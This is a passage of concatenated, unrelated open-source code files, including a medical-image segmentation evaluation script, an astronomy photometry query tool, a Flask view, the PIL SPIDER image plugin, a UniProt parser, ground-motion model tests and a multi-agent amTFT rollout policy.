image_node_new = tf.map_fn(lambda frame: frame - tf.reduce_mean(frame, axis=[0,1,2], keep_dims=True), image_node)
elif args.norm_type == 'instancenorm_meanstd':
batch_mean, batch_var = tf.nn.moments(image_node, axes=[1,2,3], keep_dims=True)
image_node_new = (image_node - batch_mean) / tf.sqrt(batch_var + 1e-6)
if args.net_type == 'myunet3d_bn_crf':
from myunet3d_basic import myunet3d_bn_crf
net_output_ops = myunet3d_bn_crf(
name='ct' if args.feat_index==0 else 'pt',
inputs=image_node_new[...,args.feat_index][...,tf.newaxis],
num_classes=NUM_CLASSES,
phase_train=phase_train,
use_bias=True,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),
bias_initializer=tf.constant_initializer(value=0.1),
kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-4),
bias_regularizer=tf.contrib.layers.l2_regularizer(1e-4),
use_crf=args.use_crf,
args=args)
pred_op = net_output_ops['y_']
prob_op = net_output_ops['y_prob']
print('pred_op shape: ', pred_op.shape)
print('prob_op shape: ', prob_op.shape)
saver = tf.train.Saver(tf.global_variables(), max_to_keep=10)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
restore_ckpt = args.restore_ckpt_meta[:-5]
print(restore_ckpt)
save_dir = restore_ckpt + '_results'
saver1 = tf.train.import_meta_graph('{}.meta'.format(restore_ckpt))
saver1.restore(sess, '{}'.format(restore_ckpt))
if save_dir != '' and not os.path.exists(save_dir):
os.makedirs(save_dir)
dices = []
for idx, filename in enumerate(args.test_filenames.split(',')):
test_filenames = pd.read_csv(
DATA_ROOT + '/' + filename,
dtype=object,
keep_default_na=False,
na_values=[]).as_matrix()
dice_val = []
for f in test_filenames:
subject_id = f[0]
img_fn = f[1]
case_name = img_fn.split('/')[-1]
ct_sitk = sitk.ReadImage(str(os.path.join(img_fn, 'InputCT_ROI.nii.gz')))
ct = sitk.GetArrayFromImage(ct_sitk).astype((np.float32))
pt_sitk = sitk.ReadImage(str(os.path.join(img_fn, 'InputPET_SUV_ROI.nii.gz')))
pt = sitk.GetArrayFromImage(pt_sitk).astype((np.float32))
lbl_ct = sitk.GetArrayFromImage(sitk.ReadImage(str(os.path.join(
img_fn, 'GTV_Primary_ROI_CT{}.nii.gz'.format(GT_POSTFIX))))).astype(np.uint8)
lbl_pt = sitk.GetArrayFromImage(sitk.ReadImage(str(os.path.join(
img_fn, 'GTV_Primary_ROI_PET{}.nii.gz'.format(GT_POSTFIX))))).astype(np.uint8)
ct[ct>200.] = 200.
ct[ct<-500.] = -500.
ct = 255*(ct+500)/(700.)
pt[pt<0.01]=0.01
pt[pt>20.]=20.
pt = 255*(pt-0.01)/(19.99)
image = np.concatenate([ct[...,np.newaxis],pt[...,np.newaxis]], axis=3)
label = np.concatenate([lbl_ct[...,np.newaxis],lbl_pt[...,np.newaxis]], axis=3)
pred, prob = sess.run([pred_op, prob_op],
feed_dict={image_node: image[np.newaxis,...],
label_node: label[np.newaxis,...],
phase_train: False})
dice_val_ = computeDice(label[...,args.feat_index], pred[0])
dice_val.append(dice_val_)
if save_dir != '':
case_save_dir = '{}/{}'.format(save_dir, case_name)
if not os.path.exists(case_save_dir):
os.makedirs(case_save_dir)
new_sitk_ct = sitk.GetImageFromArray(pred[0].astype(np.int32))
new_sitk_ct.CopyInformation(ct_sitk)
sitk.WriteImage(new_sitk_ct, str('{}/crf0_pred_{}.nii.gz'.format(case_save_dir,
'ct' if args.feat_index==0 else 'pt')))
new_sitk_ct = sitk.GetImageFromArray(prob[0][...,1].astype(np.float32))
new_sitk_ct.CopyInformation(pt_sitk)
sitk.WriteImage(new_sitk_ct, str('{}/crf0_prob_{}.nii.gz'.format(case_save_dir,
'ct' if args.feat_index==0 else 'pt')))
dices.append(np.mean(np.array(dice_val)))
print('FINAL_TEST {:.4f} {:.4f} {:.4f}'.format(dices[0],dices[1],dices[2]))
if __name__ == '__main__':
main()
|
the-stack_0_25213
|
# !/usr/bin/python3
# Copyright (C) 2016 Zhixian MA <[email protected]>
"""
A tool to query photometry of radio astro-objects from the NED
NASA/IPAC Extragalactic Database
http://ned.ipac.caltech.edu/
"""
from astroquery.ned import Ned
import numpy as np
import astroquery
import argparse
def main():
"""
Fetch radio infos from NED
References
----------
[1] astroquery
http://astroquery.readthedocs.io/en/latest/
"""
# Init
parser = argparse.ArgumentParser(
description='A tool to query photometry of radio astro-objects from the NED')
# parameters
parser.add_argument("objname", help="file path of object list.")
parser.add_argument("dataname", help="file path to save query result.")
parser.add_argument("freq", help="Upper limit of frequency.")
parser.add_argument("errlist", help="file path to save object names with errors.")
args = parser.parse_args()
# get arguments
objname = args.objname
dataname = args.dataname
freq = float(args.freq)
errlist = args.errlist
# fetch data
f = open(objname, 'r')
fs = open(dataname, 'w')
fn = open(errlist, 'w')
fs.write("Name\tBand\tFlux\tUncertainty\tUnits\tRefcode\n")
for sample in f:
print("Sample name: %s" % sample[:-1])
# fetch table
try:
obj_table = Ned.get_table(sample, table='photometry')
except astroquery.exceptions.RemoteServiceError:
fn.write('%s\n' % sample)
continue
# find radio info
freq_list = np.array(obj_table['Frequency'])
freq_idx = np.where(freq_list <= freq)[0]
print(freq_idx)
if len(freq_idx) >= 1:
# Judge measurements and uncertainties
uncer = obj_table['Uncertainty'][freq_idx]
if len(uncer) == 1:
freq_str = obj_table['Observed Passband'][freq_idx[0]]
flux = obj_table['Photometry Measurement'][freq_idx[0]]
unit = obj_table['Units'][freq_idx[0]]
ref = obj_table['Refcode'][freq_idx[0]]
# bytes to str
freq_str = str(freq_str, encoding='utf-8')
unit = str(unit, encoding='utf-8')
ref = str(ref, encoding='utf-8')
fs.write("%s\t%s\t%f\t%s\t%s\t%s\n" %
(sample[:-1], freq_str, flux, str(uncer[0], encoding='utf-8'), unit, ref))
else:
for i in range(len(uncer)):
if len(uncer[i]):
freq_str = obj_table['Observed Passband'][freq_idx[i]]
flux = obj_table['Photometry Measurement'][freq_idx[i]]
unit = obj_table['Units'][freq_idx[i]]
ref = obj_table['Refcode'][freq_idx[i]]
# bytes to str
freq_str = str(freq_str, encoding='utf-8')
unit = str(unit, encoding='utf-8')
ref = str(ref, encoding='utf-8')
fs.write("%s\t%s\t%f\t%s\t%s\t%s\n" %
(sample[:-1], freq_str, flux, str(uncer[i], encoding='utf-8'),
unit, ref))
f.close()
fs.close()
fn.close()
if __name__ == "__main__":
main()
|
the-stack_0_25214
|
# -*- coding: utf-8 -*-
# @Time : 2017/9/5 09:52
# @Author : Forec
# @File : main/views.py
# @Project : WildPointer
# @license : Copyright(C), Forec
# @Contact : [email protected]
from flask import render_template
from flask_login import current_user
from . import main
from ..models import Post, Question, Tag
@main.route('/', methods=['GET'])
def index():
mail_address = 'None@None' if not current_user.is_authenticated else current_user.email
mail_address = '#' if len(mail_address.split('#')) < 2 else mail_address.split('#')[1]
mail_address = 'mail.' + mail_address
posts = Post.query.order_by(Post.create.desc()).slice(0, 6)
questions = Question.query.order_by(Question.create.desc()).slice(0, 6)
hot_tags = Tag.query.order_by(Tag.count.asc()).slice(0, 16).all()
return render_template('index.html', posts=posts, questions=questions, mail_address=mail_address,
tags=hot_tags, used_tags=[], type='all')
@main.route('/faq', methods=['GET'])
def faq():
return render_template('faq.html')
|
the-stack_0_25217
|
#
# The Python Imaging Library.
#
# SPIDER image file handling
#
# History:
# 2004-08-02 Created BB
# 2006-03-02 added save method
# 2006-03-13 added support for stack images
#
# Copyright (c) 2004 by Health Research Inc. (HRI) RENSSELAER, NY 12144.
# Copyright (c) 2004 by William Baxter.
# Copyright (c) 2004 by Secret Labs AB.
# Copyright (c) 2004 by Fredrik Lundh.
#
##
# Image plugin for the Spider image format. This format is is used
# by the SPIDER software, in processing image data from electron
# microscopy and tomography.
##
#
# SpiderImagePlugin.py
#
# The Spider image format is used by SPIDER software, in processing
# image data from electron microscopy and tomography.
#
# Spider home page:
# https://spider.wadsworth.org/spider_doc/spider/docs/spider.html
#
# Details about the Spider image format:
# https://spider.wadsworth.org/spider_doc/spider/docs/image_doc.html
#
import os
import struct
import sys
from PIL import Image, ImageFile
def isInt(f):
try:
i = int(f)
if f - i == 0:
return 1
else:
return 0
except (ValueError, OverflowError):
return 0
iforms = [1, 3, -11, -12, -21, -22]
# There is no magic number to identify Spider files, so just check a
# series of header locations to see if they have reasonable values.
# Returns no. of bytes in the header, if it is a valid Spider header,
# otherwise returns 0
def isSpiderHeader(t):
h = (99,) + t # add 1 value so can use spider header index start=1
# header values 1,2,5,12,13,22,23 should be integers
for i in [1, 2, 5, 12, 13, 22, 23]:
if not isInt(h[i]):
return 0
# check iform
iform = int(h[5])
if iform not in iforms:
return 0
# check other header values
labrec = int(h[13]) # no. records in file header
labbyt = int(h[22]) # total no. of bytes in header
lenbyt = int(h[23]) # record length in bytes
if labbyt != (labrec * lenbyt):
return 0
# looks like a valid header
return labbyt
def isSpiderImage(filename):
with open(filename, "rb") as fp:
f = fp.read(92) # read 23 * 4 bytes
t = struct.unpack(">23f", f) # try big-endian first
hdrlen = isSpiderHeader(t)
if hdrlen == 0:
t = struct.unpack("<23f", f) # little-endian
hdrlen = isSpiderHeader(t)
return hdrlen
class SpiderImageFile(ImageFile.ImageFile):
format = "SPIDER"
format_description = "Spider 2D image"
_close_exclusive_fp_after_loading = False
def _open(self):
# check header
n = 27 * 4 # read 27 float values
f = self.fp.read(n)
try:
self.bigendian = 1
t = struct.unpack(">27f", f) # try big-endian first
hdrlen = isSpiderHeader(t)
if hdrlen == 0:
self.bigendian = 0
t = struct.unpack("<27f", f) # little-endian
hdrlen = isSpiderHeader(t)
if hdrlen == 0:
raise SyntaxError("not a valid Spider file")
except struct.error as e:
raise SyntaxError("not a valid Spider file") from e
h = (99,) + t # add 1 value : spider header index starts at 1
iform = int(h[5])
if iform != 1:
raise SyntaxError("not a Spider 2D image")
self._size = int(h[12]), int(h[2]) # size in pixels (width, height)
self.istack = int(h[24])
self.imgnumber = int(h[27])
if self.istack == 0 and self.imgnumber == 0:
# stk=0, img=0: a regular 2D image
offset = hdrlen
self._nimages = 1
elif self.istack > 0 and self.imgnumber == 0:
# stk>0, img=0: Opening the stack for the first time
self.imgbytes = int(h[12]) * int(h[2]) * 4
self.hdrlen = hdrlen
self._nimages = int(h[26])
# Point to the first image in the stack
offset = hdrlen * 2
self.imgnumber = 1
elif self.istack == 0 and self.imgnumber > 0:
# stk=0, img>0: an image within the stack
offset = hdrlen + self.stkoffset
self.istack = 2 # So Image knows it's still a stack
else:
raise SyntaxError("inconsistent stack header values")
if self.bigendian:
self.rawmode = "F;32BF"
else:
self.rawmode = "F;32F"
self.mode = "F"
self.tile = [("raw", (0, 0) + self.size, offset, (self.rawmode, 0, 1))]
self.__fp = self.fp # FIXME: hack
@property
def n_frames(self):
return self._nimages
@property
def is_animated(self):
return self._nimages > 1
# 1st image index is zero (although SPIDER imgnumber starts at 1)
def tell(self):
if self.imgnumber < 1:
return 0
else:
return self.imgnumber - 1
def seek(self, frame):
if self.istack == 0:
raise EOFError("attempt to seek in a non-stack file")
if not self._seek_check(frame):
return
self.stkoffset = self.hdrlen + frame * (self.hdrlen + self.imgbytes)
self.fp = self.__fp
self.fp.seek(self.stkoffset)
self._open()
# returns a byte image after rescaling to 0..255
def convert2byte(self, depth=255):
(minimum, maximum) = self.getextrema()
m = 1
if maximum != minimum:
m = depth / (maximum - minimum)
b = -m * minimum
return self.point(lambda i, m=m, b=b: i * m + b).convert("L")
# returns a ImageTk.PhotoImage object, after rescaling to 0..255
def tkPhotoImage(self):
from PIL import ImageTk
return ImageTk.PhotoImage(self.convert2byte(), palette=256)
def _close__fp(self):
try:
if self.__fp != self.fp:
self.__fp.close()
except AttributeError:
pass
finally:
self.__fp = None
# --------------------------------------------------------------------
# Image series
# given a list of filenames, return a list of images
def loadImageSeries(filelist=None):
"""create a list of :py:class:`~PIL.Image.Image` objects for use in a montage"""
if filelist is None or len(filelist) < 1:
return
imglist = []
for img in filelist:
if not os.path.exists(img):
print(f"unable to find {img}")
continue
try:
with Image.open(img) as im:
im = im.convert2byte()
except Exception:
if not isSpiderImage(img):
print(img + " is not a Spider image file")
continue
im.info["filename"] = img
imglist.append(im)
return imglist
# --------------------------------------------------------------------
# For saving images in Spider format
def makeSpiderHeader(im):
nsam, nrow = im.size
lenbyt = nsam * 4 # There are labrec records in the header
labrec = int(1024 / lenbyt)
if 1024 % lenbyt != 0:
labrec += 1
labbyt = labrec * lenbyt
nvalues = int(labbyt / 4)
if nvalues < 23:
return []
hdr = []
for i in range(nvalues):
hdr.append(0.0)
# NB these are Fortran indices
hdr[1] = 1.0 # nslice (=1 for an image)
hdr[2] = float(nrow) # number of rows per slice
hdr[3] = float(nrow) # number of records in the image
hdr[5] = 1.0 # iform for 2D image
hdr[12] = float(nsam) # number of pixels per line
hdr[13] = float(labrec) # number of records in file header
hdr[22] = float(labbyt) # total number of bytes in header
hdr[23] = float(lenbyt) # record length in bytes
# adjust for Fortran indexing
hdr = hdr[1:]
hdr.append(0.0)
# pack binary data into a string
return [struct.pack("f", v) for v in hdr]
def _save(im, fp, filename):
if im.mode[0] != "F":
im = im.convert("F")
hdr = makeSpiderHeader(im)
if len(hdr) < 256:
raise OSError("Error creating Spider header")
# write the SPIDER header
fp.writelines(hdr)
rawmode = "F;32NF" # 32-bit native floating point
ImageFile._save(im, fp, [("raw", (0, 0) + im.size, 0, (rawmode, 0, 1))])
def _save_spider(im, fp, filename):
# get the filename extension and register it with Image
ext = os.path.splitext(filename)[1]
Image.register_extension(SpiderImageFile.format, ext)
_save(im, fp, filename)
# --------------------------------------------------------------------
Image.register_open(SpiderImageFile.format, SpiderImageFile)
Image.register_save(SpiderImageFile.format, _save_spider)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Syntax: python3 SpiderImagePlugin.py [infile] [outfile]")
sys.exit()
filename = sys.argv[1]
if not isSpiderImage(filename):
print("input image must be in Spider format")
sys.exit()
with Image.open(filename) as im:
print("image: " + str(im))
print("format: " + str(im.format))
print("size: " + str(im.size))
print("mode: " + str(im.mode))
print("max, min: ", end=" ")
print(im.getextrema())
if len(sys.argv) > 2:
outfile = sys.argv[2]
# perform some image operation
im = im.transpose(Image.Transpose.FLIP_LEFT_RIGHT)
print(
f"saving a flipped version of {os.path.basename(filename)} "
f"as {outfile} "
)
im.save(outfile, SpiderImageFile.format)
|
the-stack_0_25219
|
#!/usr/bin/env pyhon3
from collections import Counter
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
def get_jaccard_sim(str1, str2):
a = set(str1.split())
b = set(str2.split())
c = a.intersection(b)
return float(len(c)) / (len(a) + len(b) - len(c))
# def get_cosine_sim(*strs):
# vectors = [t for t in get_vectors(*strs)]
# return cosine_similarity(vectors)
# def get_vectors(*strs):
# text = [t for t in strs]
# vectorizer = CountVectorizer(text)
# vectorizer.fit(text)
# return vectorizer.transform(text).toarray()
if __name__ == '__main__':
text1 = "This is a very interesting text"
text2 = "This is another text, also very interesting"
print("Jaccard: {}".format(get_jaccard_sim(text1,text2)))
# print("Cosine: {}".format(get_cosine_sim(text1,text2)))
|
the-stack_0_25221
|
#!/usr/bin/env python3
from cozmo.util import angle_z_to_quaternion, radians
from visualization_msgs.msg import Marker
class RectangularCuboid(object):
"""
An object class that stores information about a custom rectangular object
This object is composed of multiple cubes attached horizontally
"""
def __init__(self, num_cubes, pose, side_length):
"""
Parameters
----------
num_cubes : int
number of cubes that form this object
pose : (x, y, theta) of the object in (mm, mm, radians)
side_length : float
length of a side of the cube, in mm
"""
self.pose = pose
self.length = num_cubes * side_length
self.width = side_length
self.height = side_length
def update_object(self, cubes):
"""
Updates the object's pose given the cubes
Assumes cubes are attached horizontally
Parameters
----------
cubes : list containing LightCube objects
"""
x_positions = []
y_positions = []
for cube in cubes:
x_positions.append(cube.pose.position.x)
y_positions.append(cube.pose.position.y)
heading = cubes[0].pose.rotation.angle_z.radians
self.pose = (sum(x_positions) / len(cubes), sum(y_positions) / len(cubes), heading)
self.length = len(cubes) * self.width
def publish_cube(self, publisher, color=(0, 0.5, 0.5, 1)):
"""
Publishes the object as a cube Marker
Parameters
---------
publisher : ros publisher
color : tuple
(r, g, b, a) to represent the color of the cube
"""
cube_marker = Marker()
cube_marker.header.frame_id = "base_link"
cube_marker.type = Marker.CUBE
cube_marker.pose.position.x = self.pose[0] / 1000
cube_marker.pose.position.y = self.pose[1] / 1000
cube_marker.pose.position.z = self.height / 1000
cube_orientation = angle_z_to_quaternion(radians(self.pose[2]))
cube_marker.pose.orientation.x = cube_orientation[1]
cube_marker.pose.orientation.y = cube_orientation[2]
cube_marker.pose.orientation.z = cube_orientation[3]
cube_marker.pose.orientation.w = cube_orientation[0]
cube_marker.scale.x = self.width / 1000
cube_marker.scale.y = self.length / 1000
cube_marker.scale.z = self.width / 1000
cube_marker.color.r = color[0]
cube_marker.color.g = color[1]
cube_marker.color.b = color[2]
cube_marker.color.a = color[3]
publisher.publish(cube_marker)
def __str__(self):
return "Pose: %s, Length: %s, Width: %s" % \
(self.pose, self.length, self.width)
def __repr__(self):
return "RectangularCuboid(%s, %s, %s)" % (self.pose, self.length, self.width)
|
the-stack_0_25223
|
import evidence as evi
from copy import deepcopy
from collections import OrderedDict
def get_catalytic_activity(item, entity='all', as_cards=False):
from sabueso.cards import CatalyticActivityCard, catalytic_activity_dict
from ._add_reference_to_evidence import _add_reference_to_evidence
from ._get_reference_from_dbevidence import _get_reference_from_dbevidence
from ._get_reference_from_dbreference import _get_reference_from_dbreference
from .get_uniprot import get_uniprot
output = []
uniprot = get_uniprot(item, entity=entity)
ref_uniprot = uniprot.references[0]
### Info in comment
for comment in item['uniprot']['entry']['comment']:
if comment['@type']=='catalytic activity':
if type(comment)!=OrderedDict:
raise ValueError("Comment type not recognized for catalytic activity")
aux_dict=deepcopy(catalytic_activity_dict)
aux_dict['reaction']=evi.Evidence()
aux_dict['physiological_direction']=evi.Evidence()
aux_dict['reaction'].value=comment['reaction']['text']
if '@evidence' in comment['reaction']:
evidence_numbers = comment['reaction']['@evidence'].split(' ')
for ii in evidence_numbers:
ref = _get_reference_from_dbevidence(int(ii), item)
if ref is not None:
aux_dict['references'].append(ref)
aux_dict['reaction'].add_reference(ref)
if 'dbReference' in comment['reaction']:
dbreference = comment['physiologicalReaction']['dbReference']
if type(dbreference)==OrderedDict:
dbreference = [dbreference]
for aux in dbreference:
ref = _get_reference_from_dbreference(aux['@type'], aux['@id'])
aux_dict['references'].append(ref)
aux_dict['reaction'].add_reference(ref)
aux_dict['physiological_direction'].value=comment['physiologicalReaction']['@direction']
if '@evidence' in comment['physiologicalReaction']:
evidence_numbers = comment['physiologicalReaction']['@evidence'].split(' ')
for ii in evidence_numbers:
ref = _get_reference_from_dbevidence(int(ii), item)
if ref is not None:
aux_dict['references'].append(ref)
aux_dict['physiological_direction'].add_reference(ref)
if 'dbReference' in comment['physiologicalReaction']:
dbreference = comment['physiologicalReaction']['dbReference']
if type(dbreference)==OrderedDict:
dbreference = [dbreference]
for aux in dbreference:
ref = _get_reference_from_dbreference(aux['@type'], aux['@id'])
aux_dict['references'].append(ref)
aux_dict['physiological_direction'].add_reference(ref)
aux_dict['references'].append(ref_uniprot)
output.append(aux_dict)
if as_cards:
output = [CatalyticActivityCard(ii) for ii in output]
return output
|
the-stack_0_25224
|
# The Hazard Library
# Copyright (C) 2013-2018 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from openquake.hazardlib.gsim.boore_1993 import (
BooreEtAl1993GSCBest,
BooreEtAl1993GSCUpperLimit,
BooreEtAl1993GSCLowerLimit,
)
from openquake.hazardlib.tests.gsim.utils import BaseGSIMTestCase
# Test data provided by Geological Survey of Canada
class BooreEtAl1993GSCBestTestCase(BaseGSIMTestCase):
GSIM_CLASS = BooreEtAl1993GSCBest
def test_mean(self):
self.check('B93GSC/B93GSCBest_MEAN.csv',
max_discrep_percentage=0.1)
def test_std_total(self):
self.check('B93GSC/B93GSCBest_STD_TOTAL.csv',
max_discrep_percentage=0.1)
class BooreEtAl1993GSCUpperLimitTestCase(BaseGSIMTestCase):
GSIM_CLASS = BooreEtAl1993GSCUpperLimit
def test_mean(self):
self.check('B93GSC/B93GSCUpperLimit_MEAN.csv',
max_discrep_percentage=0.1)
def test_std_total(self):
self.check('B93GSC/B93GSCUpperLimit_STD_TOTAL.csv',
max_discrep_percentage=0.1)
class BooreEtAl1993GSCLowerLimitTestCase(BaseGSIMTestCase):
GSIM_CLASS = BooreEtAl1993GSCLowerLimit
def test_mean(self):
self.check('B93GSC/B93GSCLowerLimit_MEAN.csv',
max_discrep_percentage=0.1)
def test_std_total(self):
self.check('B93GSC/B93GSCLowerLimit_STD_TOTAL.csv',
max_discrep_percentage=0.1)
|
the-stack_0_25225
|
# xpath用法整理:https://blog.csdn.net/u013332124/article/details/80621638
import requests,io,sys,pandas
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='gb18030') #改变标准输出的默认编码
from lxml import etree
url = 'http://sz.xiaozhu.com/'
r = requests.get(url).text#使用requests获取数据
s = etree.HTML(r)#解析html数据
title = s.xpath('//*[@id="page_list"]/ul/li/div[2]/div/a/span/text()')#打印短租标题
price = s.xpath('//*[@id="page_list"]/ul/li/div[2]/span[1]/i/text()')#打印短租价格
latlng = s.xpath('//*[@id="page_list"]/ul/li/@latlng')#打印短租经纬度
print(list(i for i in zip(title,price,latlng)))
|
the-stack_0_25229
|
import numpy as np
from ray.rllib.evaluation import MultiAgentEpisode
from ray.rllib.utils.typing import TensorType
from typing import List, Union, Optional, Dict, Tuple
from marltoolbox.algos.amTFT.base_policy import amTFTPolicyBase, OWN_COOP_POLICY_IDX, OWN_SELFISH_POLICY_IDX, \
OPP_SELFISH_POLICY_IDX, OPP_COOP_POLICY_IDX
from marltoolbox.utils import rollout
class amTFTRolloutsTorchPolicy(amTFTPolicyBase):
def __init__(self, observation_space, action_space, config, **kwargs):
super().__init__(observation_space, action_space, config, **kwargs)
self._init_for_rollout(self.config)
def _init_for_rollout(self, config):
self.last_k = 1
self.use_opponent_policies = False
self.rollout_length = config["rollout_length"]
self.n_rollout_replicas = config["n_rollout_replicas"]
self.performing_rollouts = False
self.overwrite_action = []
self.own_policy_id = config["own_policy_id"]
self.opp_policy_id = config["opp_policy_id"]
self.n_steps_to_punish_opponent = 0
# Don't support LSTM (at least because of action overwriting needed in the rollouts)
if "model" in config.keys():
if "use_lstm" in config["model"].keys():
assert not config["model"]["use_lstm"]
def compute_actions(
self,
obs_batch: Union[List[TensorType], TensorType],
state_batches: Optional[List[TensorType]] = None,
prev_action_batch: Union[List[TensorType], TensorType] = None,
prev_reward_batch: Union[List[TensorType], TensorType] = None,
info_batch: Optional[Dict[str, list]] = None,
episodes: Optional[List["MultiAgentEpisode"]] = None,
explore: Optional[bool] = None,
timestep: Optional[int] = None,
**kwargs) -> \
Tuple[TensorType, List[TensorType], Dict[str, TensorType]]:
# Option to overwrite action during internal rollouts
if self.use_opponent_policies:
if len(self.overwrite_action) > 0:
actions, state_out, extra_fetches = self.overwrite_action.pop(0)
if self.verbose > 1:
print("overwritten actions", actions, type(actions))
return actions, state_out, extra_fetches
return super().compute_actions(obs_batch, state_batches, prev_action_batch, prev_reward_batch,
info_batch, episodes, explore, timestep, **kwargs)
def _select_algo_to_use_in_eval(self):
if not self.use_opponent_policies:
if self.n_steps_to_punish == 0:
self.active_algo_idx = OWN_COOP_POLICY_IDX
elif self.n_steps_to_punish > 0:
self.active_algo_idx = OWN_SELFISH_POLICY_IDX
self.n_steps_to_punish -= 1
else:
raise ValueError("self.n_steps_to_punish can't be below zero")
else:
assert self.performing_rollouts
if self.n_steps_to_punish_opponent == 0:
self.active_algo_idx = OPP_COOP_POLICY_IDX
elif self.n_steps_to_punish_opponent > 0:
self.active_algo_idx = OPP_SELFISH_POLICY_IDX
self.n_steps_to_punish_opponent -= 1
else:
raise ValueError("self.n_steps_to_punish_opp can't be below zero")
def on_episode_step(self, opp_obs, last_obs, opp_action, worker, base_env, episode, env_index):
if not self.performing_rollouts:
super().on_episode_step(opp_obs, last_obs, opp_action, worker, base_env, episode, env_index)
def _compute_debit(self, last_obs, opp_action, worker, base_env, episode, env_index, coop_opp_simulated_action):
approximated_debit = self._compute_debit_using_rollouts(last_obs, opp_action, worker)
return approximated_debit
def _compute_debit_using_rollouts(self, last_obs, opp_action, worker):
n_steps_to_punish, policy_map, policy_agent_mapping = self._prepare_to_perform_virtual_rollouts_in_env(worker)
# Cooperative rollouts
mean_total_reward_for_totally_coop_opp, _ = self._compute_opp_mean_total_reward(worker, policy_map,
policy_agent_mapping,
partially_coop=False,
opp_action=None,
last_obs=last_obs)
# Cooperative rollouts with first action as the real one
mean_total_reward_for_partially_coop_opp, _ = self._compute_opp_mean_total_reward(worker, policy_map,
policy_agent_mapping,
partially_coop=True,
opp_action=opp_action,
last_obs=last_obs)
print("mean_total_reward_for_partially_coop_opp", mean_total_reward_for_partially_coop_opp)
print("mean_total_reward_for_totally_coop_opp", mean_total_reward_for_totally_coop_opp)
opp_reward_gain_from_picking_this_action = \
mean_total_reward_for_partially_coop_opp - mean_total_reward_for_totally_coop_opp
self._stop_performing_virtual_rollouts_in_env(n_steps_to_punish)
return opp_reward_gain_from_picking_this_action
def _prepare_to_perform_virtual_rollouts_in_env(self, worker):
self.performing_rollouts = True
self.use_opponent_policies = False
n_steps_to_punish = self.n_steps_to_punish
self.n_steps_to_punish = 0
self.n_steps_to_punish_opponent = 0
assert self.n_rollout_replicas // 2 > 0
policy_map = {policy_id: self for policy_id in worker.policy_map.keys()}
policy_agent_mapping = (lambda agent_id: self._switch_own_and_opp(agent_id))
return n_steps_to_punish, policy_map, policy_agent_mapping
def _stop_performing_virtual_rollouts_in_env(self, n_steps_to_punish):
self.performing_rollouts = False
self.use_opponent_policies = False
self.n_steps_to_punish = n_steps_to_punish
def _switch_own_and_opp(self, agent_id):
if agent_id != self.own_policy_id:
self.use_opponent_policies = True
else:
self.use_opponent_policies = False
return self.own_policy_id
def _compute_punishment_duration(self, opp_action, coop_opp_simulated_action, worker, last_obs):
return self._compute_punishment_duration_from_rollouts(worker, last_obs)
def _compute_punishment_duration_from_rollouts(self, worker, last_obs):
# self.performing_rollouts = True
# self.use_opponent_policies = False
# n_steps_to_punish = self.n_steps_to_punish
# assert self.n_rollout_replicas // 2 > 0
# policy_map = {policy_id: self for policy_id in worker.policy_map.keys()}
# policy_agent_mapping = (lambda agent_id: self._switch_own_and_opp(agent_id))
n_steps_to_punish, policy_map, policy_agent_mapping = self._prepare_to_perform_virtual_rollouts_in_env(worker)
self.k_opp_loss = {}
k_to_explore = self.last_k
self.debit_threshold_wt_multiplier = self.total_debit * self.punishment_multiplier
continue_to_search_k = True
while continue_to_search_k:
k_to_explore, continue_to_search_k = self._search_duration_of_future_punishment(
k_to_explore, worker, policy_map, policy_agent_mapping, last_obs)
self._stop_performing_virtual_rollouts_in_env(n_steps_to_punish)
self.last_k = k_to_explore
print("k_opp_loss", self.k_opp_loss)
print("k found", k_to_explore, "self.total_debit", self.total_debit,
"debit_threshold_wt_multiplier", self.debit_threshold_wt_multiplier)
return k_to_explore
def _search_duration_of_future_punishment(self, k_to_explore, worker, policy_map, policy_agent_mapping, last_obs):
_ = self._compute_opp_loss_for_one_k(k_to_explore, worker, policy_map, policy_agent_mapping, last_obs)
n_steps_played = self._compute_opp_loss_for_one_k(k_to_explore - 1, worker, policy_map, policy_agent_mapping,
last_obs)
continue_to_search_k = not self._is_k_found(k_to_explore)
if continue_to_search_k:
# If all the smallest k are already explored
if (self.k_opp_loss[k_to_explore - 1] > self.debit_threshold_wt_multiplier and (k_to_explore - 1) <= 1):
k_to_explore = 1
continue_to_search_k = False
return k_to_explore, continue_to_search_k
# If there is not enough steps to be perform remaining in the episode
# to compensate for the current total debit
if k_to_explore >= n_steps_played and self.k_opp_loss[k_to_explore] < self.debit_threshold_wt_multiplier:
print("n_steps_played", n_steps_played, "k_to_explore", k_to_explore)
k_to_explore = max(self.k_opp_loss.keys())
continue_to_search_k = False
return k_to_explore, continue_to_search_k
if self.k_opp_loss[k_to_explore] > self.debit_threshold_wt_multiplier:
k_to_explore = min(self.k_opp_loss.keys())
elif self.k_opp_loss[k_to_explore] < self.debit_threshold_wt_multiplier:
k_to_explore = max(self.k_opp_loss.keys()) + 1
return k_to_explore, continue_to_search_k
def _compute_opp_loss_for_one_k(self, k_to_explore, worker, policy_map, policy_agent_mapping, last_obs):
n_steps_played = 0
if self._is_k_out_of_bound(k_to_explore):
self.k_opp_loss[k_to_explore] = 0
elif k_to_explore not in self.k_opp_loss.keys():
opp_total_reward_loss, n_steps_played = self._compute_opp_total_reward_loss(k_to_explore, worker,
policy_map,
policy_agent_mapping,
last_obs=last_obs)
self.k_opp_loss[k_to_explore] = opp_total_reward_loss
if self.verbose > 0:
print(f"k_to_explore {k_to_explore}: {opp_total_reward_loss}")
return n_steps_played
def _is_k_out_of_bound(self, k_to_explore):
return k_to_explore <= 0 or k_to_explore > self.rollout_length
def _is_k_found(self, k_to_explore):
found_k = (self.k_opp_loss[k_to_explore] >= self.debit_threshold_wt_multiplier and
